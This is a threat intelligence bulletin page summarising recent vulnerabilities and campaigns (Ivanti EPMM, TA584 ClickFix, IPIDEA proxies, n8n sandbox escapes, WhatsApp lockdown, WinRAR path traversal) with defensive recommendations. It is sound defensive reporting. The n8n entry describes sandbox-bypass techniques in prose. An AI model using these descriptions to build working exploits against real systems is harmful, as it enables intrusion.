Threat Watch Feed
🚩 – IOCs Added
The red flag indicates that Indicators of Compromise (IOCs) have been added to SRA’s Threat Feed used by CyberSOC clients. Articles may not be flagged if IOCs are not available at the time or are not applicable to the article.
Ivanti discloses active analysis guidance for Ivanti Endpoint Manager Mobile RCE vulnerabilities CVE-2026-1281 and CVE-2026-1340
Ivanti published an analysis on January 29, 2026 addressing two newly disclosed remote code execution vulnerabilities, CVE-2026-1281 and CVE-2026-1340, affecting Ivanti Endpoint Manager Mobile (EPMM). According to Ivanti, the flaws impact the In-House Application Distribution and Android File Transfer Configuration features and may allow arbitrary code execution on vulnerable EPMM appliances if successfully exploited. Ivanti states that Ivanti Endpoint Manager (EPM), Ivanti Neurons for MDM, and Ivanti Sentry are not directly impacted by these CVEs. Ivanti notes that, due to a limited number of confirmed impacted customers, there is insufficient visibility into adversary tactics to provide high-confidence atomic indicators. As a result, the guidance focuses on log analysis, detection of attempted exploitation, and post-exploitation behaviors observed in prior Ivanti-targeting campaigns.
Impact: Successful exploitation enables arbitrary code execution on the EPMM appliance and may expose sensitive device, user, and administrator data managed by the platform, including device identifiers, network information, and authentication details. Compromise of EPMM may also facilitate lateral movement through connected systems such as Ivanti Sentry, which is designed to tunnel traffic into internal networks. Ivanti advises treating confirmed exploitation as a full system compromise.
Recommendation: Organizations should review Ivanti’s analysis guidance and apply the latest EPMM security patches before conducting investigation. Critical recommendations include reviewing Apache access logs, preferably from off-box SIEM or log aggregation systems, for suspicious requests to /mifs/c/(aft|app)store/fob/ endpoints that return HTTP 404 responses and contain command-like parameters. Ivanti advises inspecting systems for post-exploitation persistence such as unexpected JSP files including modified error pages like 401.jsp, unauthorized WAR or JAR files, and evidence of reverse shells or long-running outbound connections from the appliance. If compromise is suspected, Ivanti does not recommend attempting in-place cleanup. Instead, restore EPMM from known-good backups or rebuild the appliance and migrate data, ensuring the system is isolated from the internet until fully patched. After recovery, rotate all EPMM local and service account credentials, reset LDAP or KDC lookup accounts, revoke and replace certificates used by EPMM, and review configuration changes, administrators, policies, and pushed applications for unauthorized modifications.
🚩 Proofpoint reports TA584 accelerating high volume initial access campaigns with ClickFix and new payload Tsundere Bot
Proofpoint assesses TA584 as one of the most frequently active, high volume cybercriminal threat actors it tracks and describes the group as an initial access broker operating globally. In the second half of 2025, Proofpoint observed major changes in TA584 activity, including expanded geographic targeting, adoption of ClickFix social engineering, and delivery of a newer malware family called Tsundere Bot. Proofpoint also notes overlap between TA584 and a cluster tracked as Storm-0900, and reports the actor’s monthly campaign volume tripled from March to December 2025. TA584’s recent tradecraft is characterized by high campaign churn and short operational lifespans. Proofpoint describes layered redirect and filtering infrastructure, frequent use of compromised sender accounts, and landing pages that adapt quickly across brands, themes, and regions. From late July 2025, Proofpoint observed the actor shifting to ClickFix workflows that instruct targets to execute PowerShell commands, which then retrieve additional remote PowerShell content to install payloads. Alongside its long running XWorm activity, Proofpoint highlights TA584 adoption of Tsundere Bot in late November and December 2025, describing it as malware used by multiple actors and retrieved through an installation chain that includes Node.js installation and additional scripts.
Impact: TA584’s tempo and variability can reduce the effectiveness of static detections that depend on stable senders, consistent subjects, or long lived infrastructure. The actor’s delivery methods are positioned to achieve initial footholds at scale, and Proofpoint assesses with high confidence that TA584 infections can lead to ransomware. The use of user assisted execution via ClickFix and remote scripting increases the likelihood of successful execution in environments without strong PowerShell governance and application control.
Recommendation: Recommendations include restricting PowerShell use where it is not required, enforcing application control to prevent execution of tooling from user writable paths, and creating detections for PowerShell or cmd spawning node.exe, especially when Node is installed or executed from AppData or other non standard locations. Because ClickFix relies on Windows Run execution and clipboard based workflows, consider restricting Windows+R for user groups that do not need it and add user training that explicitly calls out these fake error and CAPTCHA flows. Finally, monitor for staged redirects, geofenced landing infrastructure, and repeated short lived campaigns, and prioritize investigations when a user is observed executing PowerShell content that retrieves remote scripts immediately following web based lure interaction.
🚩 Google disrupts IPIDEA residential proxy network used to mask cybercrime and espionage activity
Google Threat Intelligence Group (GTIG) reports it led a coordinated disruption of IPIDEA, which Google assesses is one of the world’s largest residential proxy networks. Google says the disruption included legal action to take down domains used to control enrolled devices and route proxy traffic, sharing technical intelligence with platform providers and law enforcement, and updating Google Play Protect to warn users, remove affected apps, and block future installs of apps known to include IPIDEA SDKs. Google assesses these actions degraded the proxy network and reduced its pool of devices by millions. GTIG explains that residential proxy networks route traffic through consumer ISP IP space by enrolling user devices as exit nodes, often via trojanized apps or monetization SDKs embedded into otherwise benign software. GTIG states IPIDEA is associated with multiple proxy and VPN brands and SDK families (including PacketSDK, EarnSDK, CastarSDK, and HexSDK), and describes a two-tier command and control model where Tier One domains provide Tier Two node lists for tasking and proxying. GTIG also reports that in a seven-day period in January 2026 it observed more than 550 tracked threat groups using IPIDEA exit nodes to obfuscate activity including SaaS access, on-prem activity, and password spraying.
Impact: Residential proxy infrastructure like IPIDEA increases defender difficulty by making malicious activity appear to originate from consumer ISP ranges and geographically plausible locations. This can degrade detection quality for fraud controls, identity protections, and network filtering. Google also highlights risk to consumers whose devices become exit nodes, including reputational harm from abuse tied to their IPs and potential exposure of home networks when proxy software enables inbound traffic and introduces new vulnerabilities.
Recommendation: Recommendations include incorporating IPIDEA-related indicators into blocklists and detections where appropriate, tuning identity defenses to flag logins and password spray activity from residential proxy ranges, and correlating suspicious access attempts across SaaS and on-prem logs that share proxy-like infrastructure patterns. For consumer and endpoint protection, reinforce policies that restrict installation of untrusted VPN and proxy applications.
Two Sandbox Escape Vulnerabilities in n8n Enable Remote Code Execution Through AST Bypass
JFrog Security Research disclosed two sandbox escape vulnerabilities in n8n workflow automation platform on January 27, 2026. CVE-2026-1470, rated 9.9 Critical, affects the JavaScript expression evaluation engine in versions prior to 1.123.17, 2.4.5, or 2.5.1. CVE-2026-0863, rated 8.5 High, impacts Python Code node execution in “Internal” mode for versions prior to 1.123.14, 2.3.5, or 2.4.2. Both vulnerabilities enable remote code execution by bypassing Abstract Syntax Tree sanitization logic, affecting n8n’s cloud platform and self-hosted deployments. CVE-2026-1470 exploits the deprecated JavaScript with statement to bypass AST validation blocking constructor access. The n8n Tournament library sanitizes expressions through ThisSanitizer, PrototypeSanitizer, and DollarSignValidator hooks alongside static regex checks for .constructor patterns. The vulnerability leverages the with statement to define scope and introduce a decoy constructor identifier, tricking AST validation into treating constructor as a harmless variable while resolving to Function.prototype.constructor at runtime. CVE-2026-0863 abuses Python 3.10+ AttributeError exception attributes to bypass getattr restrictions in the Python Code node sandbox. The SecurityConfig denies access to eval, exec, compile, open, getattr, and other dangerous built-ins while filtering the global object.
Impact: Authenticated attackers with workflow creation privileges achieve full remote code execution on n8n instances. CVE-2026-1470 executes arbitrary code in n8n’s main node process, enabling complete instance takeover, credential theft from environment variables, and lateral movement into integrated systems. CVE-2026-0863 impacts “Internal” configuration deployments where Python executes as a subprocess on the main node rather than isolated Docker sidecar containers. Both vulnerabilities affect n8n cloud platform and self-hosted deployments, compromising AI workflow automation handling sensitive business processes and SaaS integrations.
Recommendation: Organizations running n8n should upgrade immediately to patched versions 1.123.17, 2.4.5, or 2.5.1 for CVE-2026-1470 protection, and versions 1.123.14, 2.3.5, or 2.4.2 for CVE-2026-0863 mitigation. Configure Python Code nodes to run in “External” mode using Docker sidecar containers rather than “Internal” subprocess execution. Implement least-privilege access controls restricting which users can create or modify workflows containing expression evaluations and Python code execution. Review existing workflows for malicious expressions attempting constructor access or Python formatting-based object inspection. Deploy n8n instances with minimal environment variable exposure and network segmentation preventing lateral movement following potential compromise.
WhatsApp Introduces Strict Account Settings Lockdown Feature for High-Risk Users
WhatsApp announced Strict Account Settings on January 27, 2026, a lockdown-style security feature designed to protect high-risk users from sophisticated cyber attacks. The feature targets journalists, public figures, and others facing advanced threats by implementing maximum restrictive settings through a single toggle. Users can enable the feature by navigating to WhatsApp Settings, then Privacy, then Advanced, with rollout occurring over the coming weeks. Strict Account Settings automatically blocks attachments and media from unknown senders, silences calls from contacts not in the user’s address book, and restricts additional app functionality to minimize attack surface.
Impact: The feature provides enhanced protection for high-profile individuals frequently targeted by sophisticated threat actors through spearphishing, malicious attachments, and social engineering attacks. Automatic blocking of unknown sender attachments prevents exploitation of zero-day vulnerabilities delivered through unsolicited files. Call silencing from unknown contacts mitigates voice phishing and harassment campaigns. The lockdown approach trades convenience for security by limiting how the application functions, potentially affecting legitimate communications from new contacts while significantly reducing exposure to advanced persistent threats and targeted attacks.
Recommendation: Journalists, public figures, government officials, activists, and high-risk individuals should enable Strict Account Settings to reduce exposure to sophisticated targeted attacks. Organizations supporting high-risk personnel should include this feature in security hardening guidelines for mobile communications. Users enabling the feature should establish alternative communication channels for receiving legitimate new contact requests to avoid missing important communications. Security teams should combine this WhatsApp protection with comprehensive mobile security controls including device encryption, regular security updates, and awareness training on social engineering tactics targeting messaging platforms.
🚩 Google reports active exploitation of WinRAR CVE-2025-8088 to drop payloads into Windows Startup for persistence and initial access
Google Threat Intelligence Group (GTIG) reports widespread, active exploitation of CVE-2025-8088, a critical WinRAR path traversal vulnerability, used to gain initial access and deliver a range of payloads across multiple campaigns. GTIG states the flaw was discovered and patched in July 2025, but continues to be exploited by a mix of government backed actors linked to Russia and China, as well as financially motivated groups. GTIG highlights a consistent exploitation pattern where attackers leverage the vulnerability to write files into the Windows Startup folder, enabling persistence and follow on execution. CVE-2025-8088 involves path traversal combined with Alternate Data Streams (ADS), allowing a crafted RAR archive opened in vulnerable WinRAR versions to write files to unintended locations. GTIG notes exploitation was observed as early as July 18, 2025, and RARLAB addressed the issue in WinRAR 7.13 released July 30, 2025. The NVD entry similarly describes a path traversal issue in WinRAR for Windows that can lead to code execution via crafted archives and notes exploitation in the wild.
Impact: CVE-2025-8088 remains a practical and reliable initial access vector because it exploits a common desktop utility and can blend into normal user behavior when opening archives. Successful exploitation can establish persistence via the Startup folder and enable delivery of commodity malware, credential theft tools, or espionage payloads depending on the actor. GTIG’s reporting indicates continued exploitation across diverse motivations and sectors.
Recommendation: Organizations should review GTIG’s reporting and treat WinRAR as an exposed endpoint dependency that requires aggressive patching hygiene. Critical recommendations include upgrading WinRAR to 7.13 or later across all managed Windows endpoints, verifying WinRAR is not present in unmanaged developer or shared workstation fleets, and blocking or warning on inbound RAR files from untrusted sources where feasible. Detection should focus on the predictable post exploitation behavior GTIG highlights, especially unexpected creation of LNK, CMD, BAT, HTA, or executable artifacts in Windows Startup paths and user profile Startup folders following archive interaction.
Sign up here!
To receive the TIGR Threat Watch email bulletin and critical vulnerability notifications, simply complete the form below.
Follow on Twitter
@SRA_ThreatWatch will keep you up to date with the most recent posts on your social media feed.
Subscribe to the RSS
Just copy and add this link to your RSS app and be notified immediately when new intel is posted.
How to use RSS
Following the RSS feed is easy. RSS can be added in your Outlook desktop app, and there are many free RSS readers available for your mobile device.
To follow using Outlook:
- In Outlook, right-click the RSS Feeds folder and choose Add a New RSS Feed.
- In the New RSS Feed dialog box, enter the URL of the RSS Feed: https://sra.io/category/tigr/feed
(click here for detailed instructions and additional options for Outlook)
Popular mobile RSS reader apps include:
- Feedly
- NewsBlur
- RSS Reader
- Inoreader
After installing your preferred RSS reader, you will be able to add this feed by entering the URL: https://sra.io/category/tigr/feed
Threat Bulletin Archive
No Results Found
The page you requested could not be found. Try refining your search, or use the navigation above to locate the post.
About TIGR Threat Watch
Our Threat Intelligence Gathering & Research (TIGR) team is focused on threat intelligence and curates a daily intelligence report, TIGR Threat Watch, with information collected from several industry intel sources. We also create and publish ad-hoc critical vulnerability notifications in case of critical and time-sensitive vulnerabilities or threats. These notifications include details and recommendations for mitigation/remediation.